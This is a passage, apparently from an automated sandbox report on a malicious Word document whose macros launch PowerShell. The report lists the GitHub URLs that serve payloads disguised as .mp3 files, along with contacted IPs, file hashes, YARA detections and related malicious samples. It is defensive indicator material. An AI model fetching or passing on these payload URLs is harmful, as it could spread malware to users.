http://ocsp.entrust.net0D | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.4 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown

    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://github.com/ssbb36/stv/raw/main/5.mp3 | false | | high
http://github.com/ssbb36/stv/raw/main/5.mp3 | false | | high

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://github.co | powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmp | true | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://www.windows.com/pctv. | powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp | false | | high
https://render.githubusercontent.com | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://github.com/ssbb36/stv/ra | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | | high
http://github.com/ssbb36/stv/raw | powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net03 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
https://github.com/ssbb36/stv/raw/main/1.mp3PE | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://github.com/ssbb36/stv/raw/main/4.mp3PE | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://github.com/ssbb36/stv/raw/main/2.mp3 | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
https://github.com/ssbb3 | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/3.mp3 | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
https://raw.githubuserco | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmp | false | | high
http://github.com | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://notebooks.githubusercontent.com | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/2.mp3PE | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
https://raw.githubusercontent.com | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36 | powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/4.mp3 | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp | false | | high
https://viewscreen.githubusercontent.com | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36/stv/raw/main/5.mp3PE | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmp | false | URL Reputation: safe | low
https://github.c | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36/stv/raw/main/3.mp3PE | powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net0D | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/ssbb36/stv/raw/main/1.mp3 | powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmp | false | | high
https://secure.comodo.com/CPS0 | powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmp | false | | high

                                                          Contacted IPs

                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
140.82.121.3 | unknown | United States | 36459 | GITHUBUS | false
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false

                                                          General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 515215
Start date: 04.11.2021
Start time: 02:09:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: RfORrHIRNe.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name: Without Instrumentation
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.expl.winDOC@3/10@3/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 2
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target powershell.exe, PID 2784 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
02:10:27 | API Interceptor | 43x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

Match | Associated Sample Name / URL | Detection | Context
185.199.108.133 | RfORrHIRNe.doc | malicious |
185.199.108.133 | RfORrHIRNe.doc | malicious |
185.199.108.133 | 8p0O2OJPcE.exe | malicious |
185.199.108.133 | Statement_125858.doc | malicious |
185.199.108.133 | MZ7EuvQ9IB.exe | malicious |
185.199.108.133 | zvUd7VPOfS.exe | malicious |
185.199.108.133 | ip ddos.exe | malicious |
185.199.108.133 | Ambrosial.exe | malicious |
185.199.108.133 | hwid.exe | malicious |
185.199.108.133 | fm3FU6sW77.exe | malicious |
185.199.108.133 | AY5uCs0HrY.exe | malicious |
185.199.108.133 | Pv9fSenm0V.exe | malicious |
185.199.108.133 | t63ouMqJ8f.exe | malicious |
185.199.108.133 | gnykCySWj5.exe | malicious |
185.199.108.133 | YRbcV0B6TZ.exe | malicious |
185.199.108.133 | KpDtm40Lne.exe | malicious |
185.199.108.133 | 6oi3E5jdTR.exe | malicious |
185.199.108.133 | Software patch by Silensix.exe | malicious |
185.199.108.133 | 7D4B1B72B1318CB933E0D6420813499581064F57A713B.exe | malicious |
185.199.108.133 | j1XcBWNHwh.exe | malicious |
140.82.121.3 | RfORrHIRNe.doc | malicious | github.com/ssbb36/stv/raw/main/5.mp3

Domains

Match | Associated Sample Name / URL | Detection | Context
github.com | RfORrHIRNe.doc | malicious | 140.82.121.3
 | 8p0O2OJPcE.exe | malicious | 140.82.121.3
 | PO-011121.jar | malicious | 140.82.121.4
 | iedRCXBuxs.exe | malicious | 140.82.121.4
 | MZ7EuvQ9IB.exe | malicious | 140.82.121.4
 | zvUd7VPOfS.exe | malicious | 140.82.121.3
 | hwid.exe | malicious | 140.82.121.4
 | Invoice Overdue_C0809-H03.xls.exe | malicious | 140.82.121.4
 | 1S3cLXtFN2.exe | malicious | 140.82.121.4
 | RdCWJ3MAGz.exe | malicious | 140.82.121.4
 | INVOICE.jar | malicious | 140.82.121.4
 | Md0q201V1D.exe | malicious | 140.82.121.4
 | plf5v18Xds.exe | malicious | 140.82.121.3
 | Incoming_Wire_payment_returned120 ___vaw.jar | malicious | 140.82.121.4
 | fm3FU6sW77.exe | malicious | 140.82.121.4
 | AY5uCs0HrY.exe | malicious | 140.82.121.3
 | Hgny9xwmj6.exe | malicious | 140.82.121.3
 | Pv9fSenm0V.exe | malicious | 140.82.121.3
 | t63ouMqJ8f.exe | malicious | 140.82.121.4
raw.githubusercontent.com | RfORrHIRNe.doc | malicious | 185.199.108.133
 | RfORrHIRNe.doc | malicious | 185.199.108.133
 | 8p0O2OJPcE.exe | malicious | 185.199.108.133
 | Statement_125858.doc | malicious | 185.199.108.133
 | iedRCXBuxs.exe | malicious | 185.199.110.133
 | MZ7EuvQ9IB.exe | malicious | 185.199.108.133
 | zvUd7VPOfS.exe | malicious | 185.199.108.133
 | ip ddos.exe | malicious | 185.199.108.133
 | Ambrosial.exe | malicious | 185.199.108.133
 | hwid.exe | malicious | 185.199.108.133
 | fm3FU6sW77.exe | malicious | 185.199.108.133
 | AY5uCs0HrY.exe | malicious | 185.199.108.133
 | Hgny9xwmj6.exe | malicious | 185.199.110.133
 | Pv9fSenm0V.exe | malicious | 185.199.108.133
 | t63ouMqJ8f.exe | malicious | 185.199.110.133
 | pq9FtcL817.exe | malicious | 185.199.110.133
 | gnykCySWj5.exe | malicious | 185.199.108.133
 | YRbcV0B6TZ.exe | malicious | 185.199.108.133
 | 6oi3E5jdTR.exe | malicious | 185.199.108.133
 | Software patch by Silensix.exe | malicious | 185.199.108.133

ASN

Match | Associated Sample Name / URL | Detection | Context
GITHUBUS | RfORrHIRNe.doc | malicious | 140.82.121.3
 | RfORrHIRNe.doc | malicious | 140.82.121.3
 | 8p0O2OJPcE.exe | malicious | 140.82.121.3
 | PO-011121.jar | malicious | 140.82.121.4
 | iedRCXBuxs.exe | malicious | 140.82.121.4
 | MZ7EuvQ9IB.exe | malicious | 140.82.121.4
 | zvUd7VPOfS.exe | malicious | 140.82.121.3
 | hwid.exe | malicious | 140.82.121.4
 | Invoice Overdue_C0809-H03.xls.exe | malicious | 140.82.121.4
 | RdCWJ3MAGz.exe | malicious | 140.82.121.4
 | INVOICE.jar | malicious | 140.82.121.4
 | Md0q201V1D.exe | malicious | 140.82.121.4
 | Incoming_Wire_payment_returned120 ___vaw.jar | malicious | 140.82.121.4
 | fm3FU6sW77.exe | malicious | 140.82.121.4
 | AY5uCs0HrY.exe | malicious | 140.82.121.4
 | Hgny9xwmj6.exe | malicious | 140.82.121.3
 | Pv9fSenm0V.exe | malicious | 140.82.121.3
 | t63ouMqJ8f.exe | malicious | 140.82.121.4
 | pq9FtcL817.exe | malicious | 140.82.121.3
 | gnykCySWj5.exe | malicious | 140.82.121.4
FASTLYUS | RfORrHIRNe.doc | malicious | 185.199.108.133
 | RfORrHIRNe.doc | malicious | 185.199.108.133
 | NtxIAL7Vqi.dll | malicious | 151.101.1.108
 | SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dll | malicious | 151.101.1.44
 | #Ud83d#Udd0a VM 9193407283.wav.html | malicious | 151.101.1.229
 | 8p0O2OJPcE.exe | malicious | 185.199.108.133
 | DELAY NOTICE - WAN HAI 261 S321 - SO 3110.exe | malicious | 151.101.1.211
 | Order_10112021 40200 p.m..html | malicious | 151.101.1.229
 | Oh49Bck5BV.exe | malicious | 151.101.194.199
 | Documents_photos.html | malicious | 151.101.112.193
 | nEVkwpjXlu.apk | malicious | 151.101.2.137
 | SOA OCT-NOV 2021.exe | malicious | 151.101.1.211
 | Statement_125858.doc | malicious | 185.199.108.133
 | cs.exe | malicious | 151.101.1.164
 | mipsel | malicious | 167.82.53.249
 | 6575DHL_6757.exe | malicious | 185.199.108.153
 | PO-011121.jar | malicious | 199.232.192.209
 | iedRCXBuxs.exe | malicious | 185.199.110.133
 | MZ7EuvQ9IB.exe | malicious | 185.199.108.133
 | zvUd7VPOfS.exe | malicious | 185.199.108.133

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
05af1f5ca1b87cc9cc9b25185115607d | RfORrHIRNe.doc | malicious | 185.199.108.133, 140.82.121.3
 | IMPORTS INVOICE.doc | malicious | 185.199.108.133, 140.82.121.3
 | Purchase Order NO_0184930.doc | malicious | 185.199.108.133, 140.82.121.3
 | BL_DOCUMENT.xlsx | malicious | 185.199.108.133, 140.82.121.3
 | Order-135078.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Bill_630781.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Purchase Order PO03112021STK.docx | malicious | 185.199.108.133, 140.82.121.3
 | Payment 846725.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | inv-16731.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Purchase Order PO03112021STK.docx | malicious | 185.199.108.133, 140.82.121.3
 | INV 683068.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Payment-4091.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Bill.61566.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | inv-53639.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | INV.738108.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Order.48868.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | inv.030976.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | INV 362996.xlsb | malicious | 185.199.108.133, 140.82.121.3
 | Copy of Quote_ref-05550.xlsm | malicious | 185.199.108.133, 140.82.121.3
 | RFQ - 0211.docx | malicious | 185.199.108.133, 140.82.121.3

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 14848
Entropy (8bit): 3.3725979630377574
Encrypted: false
SSDEEP: 96:3ytv5uI73ysCMbgC46c2GpJW/RA1wabyB0C6PkTg1vC+X0jkbA6jwqgW6aajix2:itTrysR0F6KKeyUxN0jksS5a
MD5: 4FACF23F7684483187C7F5C8A95A3EC3
SHA1: 8E6DBBEB3D712567E4AFA6F1EE316D8E45D82BCD
SHA-256: 9C270C24CBA8E693CBB0B0C0751FEBD30A4C415DC2CE27BD14C93ABDEC77EF5E
SHA-512: 749F996FFF891F82A348A9B462297D4148F61F69AA18630091FAA898678958977AEDF5E3884EC46CDB12434EF8C33C78A44D5552E4F0809DA8DF9BBDE594EFA4
Malicious: false
Yara Hits:
• Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, Author: Florian Roth
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, Author: Florian Roth
Reputation: low
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1CEAA27-5E98-4FA5-88E5-2DF8BA910B6B}.tmp
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1024
                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF37E635CE383E64B4.TMP
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14336
                                                                                                  Entropy (8bit):3.5165141323354954
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:tTnUby6wGAO0jkebEw7ZtmnX9fpzJi9XUaE:ZUbyPGAO0jkytyNfpzJi9i
                                                                                                  MD5:1D1A6717B98F1EBC58340B03478D7BB3
                                                                                                  SHA1:7D8B09518284020B55A0E46D01E3D979B899463A
                                                                                                  SHA-256:77076EF5A7A01AC30CB3DD960BB7C2CE674DB9EC05E4E2F319DCC89B17F56BFA
                                                                                                  SHA-512:BD46EFB2B91EC2C3AECB5FA58ACB183E9F83496730EDFCFB2B7A2F65B9B1CCA5ECBB197D70D782F47514ED707B6FA87088D905474B3E34C958D3D5B08FC12E0E
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, Author: Florian Roth
                                                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, Author: Florian Roth
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:low
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RfORrHIRNe.LNK
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:09:03 2021, mtime=Mon Aug 30 20:09:03 2021, atime=Thu Nov 4 08:10:23 2021, length=38912, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1014
                                                                                                  Entropy (8bit):4.536793283070465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:8fBrFgXg/XAlCPCHaXmk5BeXB/0JX+W2McTOflIicvbVJJlEDtZ3YilMMEpxRljN:8fB3/XTD5wXo17eRlEDv3q6Qd7Qy
                                                                                                  MD5:B266F1082FC57506C2BF5EB8FFB78305
                                                                                                  SHA1:8127B59ADCBE2D4C45731B8CC3AD2E346E846501
                                                                                                  SHA-256:40AC6DC59826CD2E0170CDBD798F0A42983E48FE65CAD7416999FE8D9501EF70
                                                                                                  SHA-512:7251449BB45B8499A8295F40D7242470D72D02F0F49762F007D1F9D18D93B8B05827FC30118F3112D41B2F30B6098CAB0C5D78C7F2C9C5D2EF6CE103093C94C5
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):71
                                                                                                  Entropy (8bit):4.5549224798255485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:bDuMJlvQ9sm2mX1esm2v:bCkurUrI
                                                                                                  MD5:8DC46D624D55247F3AFCDF57A59AD13A
                                                                                                  SHA1:8AF5CE5B75E603C633DF82EBED33186753FB52BC
                                                                                                  SHA-256:903B82AD8418567C1F8EB0127EA8A86876D3C8CC86C10D1606B4D6CC7F82F2B8
                                                                                                  SHA-512:32D98F2F022128F67B3DF32680F1E45F3DAE22E7CEF27EEC184E4492A9C19A2C78DF7065D30C7C16A7C1D28558DB23B36D691283521609D16075A3A3B0E0205C
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: [folders]..Templates.LNK=0..RfORrHIRNe.LNK=0..[doc]..RfORrHIRNe.LNK=0..
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):162
                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                  MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                  SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                  SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                  SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8016
                                                                                                  Entropy (8bit):3.576861516597677
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:chQCoMq/qvsqvJCwoUz8hQCoMq/qvsEHyqvJCworaz5fYoH3F2QxlUVWA2:c2yoUz826Hnoraz55F2QTA2
                                                                                                  MD5:FAAE98B11184BE3D6BB52CBA6C0652B6
                                                                                                  SHA1:071516ACBA817DC61F815F8AB06E9894511BE39E
                                                                                                  SHA-256:A3C6C74C2F81E4CB67B9836D12EAF03CB1C3A023CC5D54D7B602F14AA90EBC8A
                                                                                                  SHA-512:81D2547D09974AFAB7662C465B36EC387FB3FDFAC579D95F6668D98DC56BC88FE687975257F6D0C04B8ACF00AB8CED0021884F9AE979D9CD03DAD872B9BDDB61
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DWONBQMPU6GVS2C7EY4N.temp
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8016
                                                                                                  Entropy (8bit):3.576861516597677
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:chQCoMq/qvsqvJCwoUz8hQCoMq/qvsEHyqvJCworaz5fYoH3F2QxlUVWA2:c2yoUz826Hnoraz55F2QTA2
                                                                                                  MD5:FAAE98B11184BE3D6BB52CBA6C0652B6
                                                                                                  SHA1:071516ACBA817DC61F815F8AB06E9894511BE39E
                                                                                                  SHA-256:A3C6C74C2F81E4CB67B9836D12EAF03CB1C3A023CC5D54D7B602F14AA90EBC8A
                                                                                                  SHA-512:81D2547D09974AFAB7662C465B36EC387FB3FDFAC579D95F6668D98DC56BC88FE687975257F6D0C04B8ACF00AB8CED0021884F9AE979D9CD03DAD872B9BDDB61
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\Desktop\~$ORrHIRNe.doc
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):162
                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                  MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                  SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                  SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                  SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                  Malicious:false

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Wed Nov 3 22:06:00 2021, Last Saved Time/Date: Wed Nov 3 22:17:00 2021, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
                                                                                                  Entropy (8bit):3.971846508462655
                                                                                                  TrID:
                                                                                                  • Microsoft Word document (32009/1) 54.23%
                                                                                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                  File name:RfORrHIRNe.doc
                                                                                                  File size:38912
                                                                                                  MD5:955d5d2855b291a3cf1fc6655bbbbb79
                                                                                                  SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
                                                                                                  SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
                                                                                                  SHA512:044f7164d30798656cb0f17f1a7ab76cdceb2f6bfb1107f04a6f300d2551459d0804a03db76591a7a10a900fddc8a7da5d9442ec4846709f9c9684e1aaeaf14e
                                                                                                  SSDEEP:384:o/MMMOtM1ulwUmDoKdAa8WRGbiSAoKXMVkK54miJ2JLN0jUDt3ou0FeK:o/MMMOtM1ulwU0T1MVkzmM2fxyu0FeK

                                                                                                  File Icon

                                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                                  Static OLE Info

                                                                                                  General

                                                                                                  Document Type:OLE
                                                                                                  Number of OLE Files:1

                                                                                                  OLE File "RfORrHIRNe.doc"

                                                                                                  Indicators

                                                                                                  Has Summary Info:True
                                                                                                  Application Name:Microsoft Office Word
                                                                                                  Encrypted Document:False
                                                                                                  Contains Word Document Stream:True
                                                                                                  Contains Workbook/Book Stream:False
                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                  Contains Visio Document Stream:False
                                                                                                  Contains ObjectPool Stream:
                                                                                                  Flash Objects Count:
                                                                                                  Contains VBA Macros:True

                                                                                                  Summary

                                                                                                  Code Page:1251
                                                                                                  Title:
                                                                                                  Subject:
                                                                                                  Author:Admin
                                                                                                  Keywords:
                                                                                                  Comments:
